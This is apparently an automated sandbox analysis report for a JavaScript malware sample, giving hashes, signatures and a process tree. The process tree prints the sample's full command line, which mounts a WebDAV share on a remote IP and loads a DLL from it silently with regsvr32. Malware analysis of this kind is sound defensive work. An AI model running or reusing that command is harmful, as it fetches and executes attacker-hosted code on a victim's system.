Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
23/07/2024, 02:14
Static task
static1
Behavioral task
behavioral1
Sample
459218370446121433.js
Resource
win7-20240708-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
459218370446121433.js
Resource
win10v2004-20240709-en
5 signatures
150 seconds
General
-
Target
459218370446121433.js
-
Size
5KB
-
MD5
d8c4529a4f1db13819e670d2a913c7bd
-
SHA1
300a1948006261f19afa6547cb89f2170f6d5296
-
SHA256
83a34d7d1ddce6af24d568f85bd113fbe88708b81f402d5821eaf100120e3e1d
-
SHA512
ba7cc27c796347e8ca866386355594552a434b7a81c5e4d9c7aabbc52a97e7f7465ae69345189476cb280c1954cff13f894ab200a0504992d85fe626244e2d32
-
SSDEEP
96:u5BwDXfVyX94cVNs7aqlAq4JnAkzKaH4Jng:uHw7VyX94WNs7tlAq4nAkzKaH4ng
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 816 wrote to memory of 2328 816 wscript.exe 31 PID 816 wrote to memory of 2328 816 wscript.exe 31 PID 816 wrote to memory of 2328 816 wscript.exe 31 PID 2328 wrote to memory of 776 2328 cmd.exe 33 PID 2328 wrote to memory of 776 2328 cmd.exe 33 PID 2328 wrote to memory of 776 2328 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\459218370446121433.js1⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\31400226922294.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:776
-
-